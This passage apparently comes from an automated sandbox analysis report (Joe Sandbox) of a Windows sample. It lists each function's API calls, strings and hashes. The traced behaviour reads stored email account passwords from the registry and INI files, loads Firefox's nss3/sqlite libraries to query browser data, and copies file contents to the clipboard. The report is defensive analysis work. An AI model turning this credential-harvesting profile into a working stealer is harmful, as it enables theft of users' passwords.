                  • API String ID: 3664257935-0
                  • Opcode ID: 9daaca44af3c137c04138a24eb8ff8cf64b72ee1785e34895ec44d417b16343b
                  • Instruction ID: a9857fde68bfdf8991c7705c8330266d98638ef7b5ff2aef664b3e01c595234a
                  • Opcode Fuzzy Hash: 9daaca44af3c137c04138a24eb8ff8cf64b72ee1785e34895ec44d417b16343b
                  • Instruction Fuzzy Hash: 54D012B61003118FDB209F14EC0CBE133ECAF40312F15C4B9E951A7156C3349540CA58
                  Function 0040F402 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                  Download Yara Rule
                  APIs
                  • EnumResourceNamesA.KERNEL32(?,?,0040F37C,00000000), ref: 0040F411
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: EnumNamesResource
                  • String ID:
                  • API String ID: 3334572018-0
                  • Opcode ID: 37d1da76d95b5e126e15f716cf118d031e4b8f34fe6c8a3d6132a8d2fb8fd21e
                  • Instruction ID: fad5876d7f8aa1560905c766ba53a11d3010bfcf0403834e812c2ac38a9eeaed
                  • Opcode Fuzzy Hash: 37d1da76d95b5e126e15f716cf118d031e4b8f34fe6c8a3d6132a8d2fb8fd21e
                  • Instruction Fuzzy Hash: 88C09B31594341D7C711DF208C05F1BFEE5BB5C702F108C3D7151D40E4C77180189615
                  Function 004070C5 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                  Download Yara Rule
                  APIs
                  • FindClose.KERNELBASE(?,00406FDF,?,?,00000000,?,00411327,*.oeaccount,0041141B,?,00000104), ref: 004070CF
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseFind
                  • String ID:
                  • API String ID: 1863332320-0
                  • Opcode ID: 1626034a8a252c87a5f1d6eb16cf0afdbdd25481107d0dfa13c5d9d9acae7190
                  • Instruction ID: fb6f9d5761a39194e530e87d941626cbb459cc8d01e30c2ad93bf7984ca40ca8
                  • Opcode Fuzzy Hash: 1626034a8a252c87a5f1d6eb16cf0afdbdd25481107d0dfa13c5d9d9acae7190
                  • Instruction Fuzzy Hash: 77C09230510A01ABD23C5F389C5A46A7BA0AF593323B48F6CE0F3D24F0E73899868A04
                  Function 0040EF05 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                  Download Yara Rule
                  APIs
                  • FreeLibrary.KERNELBASE(?,0040EF39,?,?,?,?,?,?,00404221), ref: 0040EF11
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: FreeLibrary
                  • String ID:
                  • API String ID: 3664257935-0
                  • Opcode ID: 2e074f5d4832a7d58a2bd7b26742b92faf01e6cbf369b165caea939fd76fa933
                  • Instruction ID: 3414d520a0ca87f174e03c7aae78275fe345844bef97b548c291c08909f1245b
                  • Opcode Fuzzy Hash: 2e074f5d4832a7d58a2bd7b26742b92faf01e6cbf369b165caea939fd76fa933
                  • Instruction Fuzzy Hash: 62C04C31210702DBEB218B12C849753B7E8AB40317F40CC68945695494D77DE454CE18
                  Function 00406155 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                  Download Yara Rule
                  APIs
                  • GetFileAttributesA.KERNELBASE(?,00408328,?,004083DE,00000000,?,00000000,00000104,?), ref: 00406159
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: AttributesFile
                  • String ID:
                  • API String ID: 3188754299-0
                  • Opcode ID: 926f1fff4bfe7087d2453ca09093eb98846d62159ddff5e69568d7a31b1a8361
                  • Instruction ID: f305466360af1034a225c08a34d2ddc6697937c487c9f6746c0aa1a011dcbbf5
                  • Opcode Fuzzy Hash: 926f1fff4bfe7087d2453ca09093eb98846d62159ddff5e69568d7a31b1a8361
                  • Instruction Fuzzy Hash: CCB012753100005BCB080B349C4A0CD35506F446327204B3CB033C00F0D720CE60BA00
                  Function 0040F1B0 Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                  Download Yara Rule
                  APIs
                  • RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040F559,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040F1C3
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: Open
                  • String ID:
                  • API String ID: 71445658-0
                  • Opcode ID: 0defe296c07798555785544969a09239eaeede922113c6288443005d002a046f
                  • Instruction ID: 6c28280414aaf847a098fae787e0885161fd0282473b9be1e1f1fd42ed515737
                  • Opcode Fuzzy Hash: 0defe296c07798555785544969a09239eaeede922113c6288443005d002a046f
                  • Instruction Fuzzy Hash: 41C09B35544301FFDE118F40ED05F09BFA1AB88B05F008414B244240B1C2718414EB17
                  Function 00401808 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                  Download Yara Rule
                  APIs
                  • DefWindowProcA.USER32(?,?,?,?,004019D4,?,?,?), ref: 0040181A
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: ProcWindow
                  • String ID:
                  • API String ID: 181713994-0
                  • Opcode ID: 41d0657a6ca65bec123c94d32be3811cc646216fbedcb2d1f0efeb7b09bfaf38
                  • Instruction ID: fb3ddee3b07d71e7bca7acd0b5fe8f04ac65e6ee1acd5581bfa893650ac4d969
                  • Opcode Fuzzy Hash: 41d0657a6ca65bec123c94d32be3811cc646216fbedcb2d1f0efeb7b09bfaf38
                  • Instruction Fuzzy Hash: 5CC00C76508100FFCE425F50DD04D4ABB66AB95315F15C469F19944135C7738561EB15
                  Function 0040AEB7 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                  Download Yara Rule
                  APIs
                  • PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040AEC6
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: MessagePost
                  • String ID:
                  • API String ID: 410705778-0
                  • Opcode ID: 60ea05e37354249f88e66d0bcdee44a25c2cc333a442d33a2d3445e2a47da255
                  • Instruction ID: ea89e85155476ffbf5940f574962b467ecbbbfdc4f529f07fe84d42430be8e09
                  • Opcode Fuzzy Hash: 60ea05e37354249f88e66d0bcdee44a25c2cc333a442d33a2d3445e2a47da255
                  • Instruction Fuzzy Hash: 11B002B07C4704BAED515F559D0EFD575515750B05F1540B073457D0F19ED11591950C

                  Non-executed Functions

                  Function 0040FCBC Relevance: 61.4, APIs: 22, Strings: 13, Instructions: 143libraryloaderstringCOMMON
                  Download Yara Rule
                  APIs
                  • memset.MSVCRT ref: 0040FCE5
                  • strcpy.MSVCRT(?,?,?,?,00000000), ref: 0040FCFC
                  • memset.MSVCRT ref: 0040FD29
                  • strcpy.MSVCRT(?,?,?,00000000,00000104,?,?,00000000), ref: 0040FD3C
                  • strcat.MSVCRT(?,\sqlite3.dll,?,?,?,00000000,00000104,?,?,00000000), ref: 0040FD4D
                  • strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040FD73
                  • strcat.MSVCRT(?,\mozsqlite3.dll,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040FD84
                  • strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040FDAB
                  • strcat.MSVCRT(?,\nss3.dll,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040FDBC
                  • GetModuleHandleA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040FDCB
                  • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040FDE2
                  • GetModuleHandleA.KERNEL32(sqlite3.dll,?,?,00000000), ref: 0040FDF0
                  • LoadLibraryA.KERNEL32(sqlite3.dll,?,?,00000000), ref: 0040FDFE
                  • GetProcAddress.KERNEL32(?,sqlite3_open), ref: 0040FE1E
                  • GetProcAddress.KERNEL32(?,sqlite3_prepare), ref: 0040FE2A
                  • GetProcAddress.KERNEL32(?,sqlite3_step), ref: 0040FE37
                  • GetProcAddress.KERNEL32(?,sqlite3_column_text), ref: 0040FE44
                  • GetProcAddress.KERNEL32(?,sqlite3_column_int), ref: 0040FE51
                  • GetProcAddress.KERNEL32(?,sqlite3_column_int64), ref: 0040FE5E
                  • GetProcAddress.KERNEL32(?,sqlite3_finalize), ref: 0040FE6B
                  • GetProcAddress.KERNEL32(?,sqlite3_close), ref: 0040FE78
                  • GetProcAddress.KERNEL32(?,sqlite3_exec), ref: 0040FE85
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc$strcpy$strcat$HandleLibraryLoadModulememset
                  • String ID: \mozsqlite3.dll$\nss3.dll$\sqlite3.dll$sqlite3.dll$sqlite3_close$sqlite3_column_int$sqlite3_column_int64$sqlite3_column_text$sqlite3_exec$sqlite3_finalize$sqlite3_open$sqlite3_prepare$sqlite3_step
                  • API String ID: 2571629209-2385123308
                  • Opcode ID: f879ae07ce377879295b5903e709fdbb1205cb1f9dca58ec31e17bd31d5cb62c
                  • Instruction ID: c8562112cbf9eae777f2394b99ada5fc335e217e34df457794dbf1c8b1b14659
                  • Opcode Fuzzy Hash: f879ae07ce377879295b5903e709fdbb1205cb1f9dca58ec31e17bd31d5cb62c
                  • Instruction Fuzzy Hash: 86516371900308AECB30EFA1DD45ECB7BF8AF58704F10497BE649E2641E678E6858F58
                  Function 00402D74 Relevance: 29.9, APIs: 5, Strings: 12, Instructions: 153stringregistryCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0040F1B0: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040F559,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040F1C3
                    • Part of subcall function 0040F1F1: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,0040F582,?,?,?,?,0040F582,00000000,?,?), ref: 0040F20C
                    • Part of subcall function 0040F1CA: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402904,?,?,?,?,00402904,?,?), ref: 0040F1E9
                    • Part of subcall function 0040F214: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,0040245F,?), ref: 0040F22A
                  • strcpy.MSVCRT(?,?), ref: 00402E8B
                  • strcpy.MSVCRT(?,?,?,?), ref: 00402E9E
                  • strcpy.MSVCRT(?,?), ref: 00402F2B
                  • strcpy.MSVCRT(?,?,?,?), ref: 00402F38
                  • RegCloseKey.ADVAPI32(?), ref: 00402F92
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: strcpy$QueryValue$CloseOpen
                  • String ID: DisplayName$EmailAddress$PopAccount$PopLogSecure$PopPassword$PopPort$PopServer$SMTPAccount$SMTPLogSecure$SMTPPassword$SMTPPort$SMTPServer
                  • API String ID: 4127491968-1534328989
                  • Opcode ID: 4a263c393ebea8c7b3aa3f5485092cacd202bcda1693c223d9a8b8372ccc35ea
                  • Instruction ID: 3eb728c69d877055b887914c3e29035f7ad0c3b4bfdbdde50966da93315596c3
                  • Opcode Fuzzy Hash: 4a263c393ebea8c7b3aa3f5485092cacd202bcda1693c223d9a8b8372ccc35ea
                  • Instruction Fuzzy Hash: 315139B1910218BEDB21EF51CD06BDE777CAF04304F1081B7BA08B6191E7789B989F58
                  Function 00405FD0 Relevance: 16.6, APIs: 11, Instructions: 58clipboardmemoryfileCOMMON
                  Download Yara Rule
                  APIs
                  • EmptyClipboard.USER32 ref: 00405FDA
                    • Part of subcall function 00405ED5: CreateFileA.KERNEL32(0041133F,80000000,00000001,00000000,00000003,00000000,00000000,0041127B,0041141B,?,0041133F,?,?,*.oeaccount,0041141B,?), ref: 00405EE7
                  • GetFileSize.KERNEL32(00000000,00000000), ref: 00405FF7
                  • GlobalAlloc.KERNEL32(00002000,00000001), ref: 00406008
                  • GlobalLock.KERNEL32(00000000), ref: 00406015
                  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406028
                  • GlobalUnlock.KERNEL32(00000000), ref: 00406037
                  • SetClipboardData.USER32(00000001,00000000), ref: 00406040
                  • GetLastError.KERNEL32 ref: 00406048
                  • CloseHandle.KERNEL32(?), ref: 00406054
                  • GetLastError.KERNEL32 ref: 0040605F
                  • CloseClipboard.USER32 ref: 00406068
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                  • String ID:
                  • API String ID: 3604893535-0
                  • Opcode ID: 5d04c3275f228edfc2a9dcea81e5f6d2cb0bf8e7915dc2d704a3e214ce43d208
                  • Instruction ID: 46ab690def339a2f00972c0b4152e32a3d13c207705114ffa6be22e44c23a91c
                  • Opcode Fuzzy Hash: 5d04c3275f228edfc2a9dcea81e5f6d2cb0bf8e7915dc2d704a3e214ce43d208
                  • Instruction Fuzzy Hash: A0112875544205BFDB10AFA4AC48B9A7FB8EB08316F118176F906E22A1DB748A44CA69
                  Function 00406073 Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemorystringCOMMON
                  Download Yara Rule
                  APIs
                  • EmptyClipboard.USER32 ref: 0040607B
                  • strlen.MSVCRT ref: 00406088
                  • GlobalAlloc.KERNEL32(00002000,00000001,?,?,?,?,0040AFC1,?), ref: 00406097
                  • GlobalLock.KERNEL32(00000000,?,?,?,?,0040AFC1,?), ref: 004060A4
                  • memcpy.MSVCRT ref: 004060AD
                  • GlobalUnlock.KERNEL32(00000000), ref: 004060B6
                  • SetClipboardData.USER32(00000001,00000000), ref: 004060BF
                  • CloseClipboard.USER32 ref: 004060CF
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpystrlen
                  • String ID:
                  • API String ID: 3116012682-0
                  • Opcode ID: c70b900a696f57a29a369809a0454994a779be389cf8b88d1f6a35ab18b15240
                  • Instruction ID: d09f43d2fefddb7d7ea69405cde3b0bd2fff4912bca4764858ce7f0ae225efb5
                  • Opcode Fuzzy Hash: c70b900a696f57a29a369809a0454994a779be389cf8b88d1f6a35ab18b15240
                  • Instruction Fuzzy Hash: 09F090371402296BC2102FA4BC4CE9B7FACDF88B56B058139FA0AD2251DE74894486A9
                  Function 0040ADA4 Relevance: 9.1, APIs: 6, Instructions: 54fileclipboardCOMMON
                  Download Yara Rule
                  APIs
                  • GetTempPathA.KERNEL32(00000104,?), ref: 0040ADBE
                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040ADD0
                  • GetTempFileNameA.KERNEL32(?,0041444C,00000000,?), ref: 0040ADF2
                  • OpenClipboard.USER32(?), ref: 0040AE12
                  • GetLastError.KERNEL32 ref: 0040AE2B
                  • DeleteFileA.KERNEL32(00000000), ref: 0040AE48
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                  • String ID:
                  • API String ID: 2014771361-0
                  • Opcode ID: b36e7ecf8624d8c90ea66491b75dc4c52724ce01200d4d7616f195176cae1ddb
                  • Instruction ID: 7dfed4210218cbe3633ab85fc006b2e48c808a0cdacf0b0ca9692cf87dba871e
                  • Opcode Fuzzy Hash: b36e7ecf8624d8c90ea66491b75dc4c52724ce01200d4d7616f195176cae1ddb
                  • Instruction Fuzzy Hash: 071165725443186BDB209B61DC49FCB7BBCAF14706F0441B6F689E2091EB78DAC48B69
                  Function 004033B1 Relevance: 7.6, Strings: 6, Instructions: 61COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: PrivateProfileString_mbscmpstrlen
                  • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                  • API String ID: 3963849919-1658304561
                  • Opcode ID: 597409f585b18e28f020b58d473e644e7b11ec3109896bedd661c4ad4da97b59
                  • Instruction ID: ad4fe9f44f4ec6704836124f0b121ca839780027ba1e1250375890495da90f14
                  • Opcode Fuzzy Hash: 597409f585b18e28f020b58d473e644e7b11ec3109896bedd661c4ad4da97b59
                  • Instruction Fuzzy Hash: F421BEB1C0022C6EDB61EF118D86FED7B7C9F45705F4000ABAA48B6092DB7C5BC59E59
                  Function 00406282 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                  Download Yara Rule
                  APIs
                  • GetVersionExA.KERNEL32(00418118,0000001A,0040F4E8,00000104), ref: 0040629C
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: Version
                  • String ID:
                  • API String ID: 1889659487-0
                  • Opcode ID: 4ef98d3589c27af49cae22675b267854afe1d3363596bc0cac78b0a9285f8b1d
                  • Instruction ID: 237572770da6cdec3f20c1cd15f55f1c4e3d09a34ceac29ab19b180c030d7de4
                  • Opcode Fuzzy Hash: 4ef98d3589c27af49cae22675b267854afe1d3363596bc0cac78b0a9285f8b1d
                  • Instruction Fuzzy Hash: 2AC04C36511120BBD7505B69FC0ABC576989709326F15C07EB901A2256CBB80E878FDC
                  Function 0040BF6B Relevance: .6, Instructions: 595COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b84eadeceb15b833d74a6b3ddcf4bdaa302aef256980365e51470e07e4227508
                  • Instruction ID: 8e3ad788e2b47047ad7c21b66b362804302468dbbdc0c1ed7242a88a839864d8
                  • Opcode Fuzzy Hash: b84eadeceb15b833d74a6b3ddcf4bdaa302aef256980365e51470e07e4227508
                  • Instruction Fuzzy Hash: FC42D5B7E403299FCB14CFD5C8C0589F7B2BFD8314B1B95958918BB216D2B4BA468BD0
                  Function 00404F58 Relevance: .3, Instructions: 346COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 45a2655c9ce598f9aff01b1782757f780416675e5ac7cea9a557e58993665817
                  • Instruction ID: c8780dc2752f1dd6eab6e238a0c3ddba928e41edca2983f589a9e6463379b6bc
                  • Opcode Fuzzy Hash: 45a2655c9ce598f9aff01b1782757f780416675e5ac7cea9a557e58993665817
                  • Instruction Fuzzy Hash: 0FA1CE37BA4B0A07E30889EAACC6395B5D397D8314F6E423D9B34C73D2E9FC59168194
                  Function 00404EC7 Relevance: .0, Instructions: 48COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0bbcacfff3d007f8ba4df6050e74c9d9e9b3729906fc48c14092c1c50e174df2
                  • Instruction ID: f119ae820a612d4e49c816f819756393efe6ef5ca55a1a060cd83ef1bb4a5302
